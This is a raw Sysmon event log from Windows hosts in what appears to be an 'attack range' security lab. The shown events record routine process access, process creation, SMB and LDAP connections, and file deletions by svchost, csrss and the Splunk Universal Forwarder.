11:22:47.150{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222426Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:47.150{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222425Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:47.150{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222424Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:47.150{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222423Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:47.150{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222422Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:47.150{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222421Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:47.150{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222420Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:47.150{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222419Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:47.150{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222418Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:47.150{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-1907-6216-3C05-000000003902}4008C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000222417Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:47.150{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1907-6216-3C05-000000003902}4008C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000222416Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:47.153{4F8D34B0-1907-6216-3C05-000000003902}4008C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000298597Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:45.459{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local49544-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local445microsoft-ds 354300x8000000000000000298596Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:45.455{C8EA50B7-F118-6215-0100-000000003802}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local49544-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local445microsoft-ds 354300x8000000000000000298595Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:45.357{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49543-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000298594Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:45.357{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49543-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000298593Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:47.033{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E4094F41B8235F9D23D3897FA6AFDC3E,SHA256=7EA7DE999850FA7D809CCFEBA2DC1B8095A1D41CB390CFD9FD5A3378C1E78C85,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298600Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:22:48.763{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58A9CD3E54B61AF8BF490F64BC9B05EF,SHA256=5E0CB886C521B39663F1B65BFAF8C910B6F317EEDEA84680740D2C1EA0A41F1B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000222445Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:48.994{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1908-6216-3D05-000000003902}3076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222444Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:48.994{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222443Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:48.994{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222442Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:48.994{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222441Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:48.994{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222440Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:48.994{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222439Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:48.994{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222438Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:48.994{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222437Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:48.994{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222436Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:48.994{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222435Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:48.994{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1908-6216-3D05-000000003902}3076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000222434Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:22:48.994{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1908-6216-3D05-000000003902}3076C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 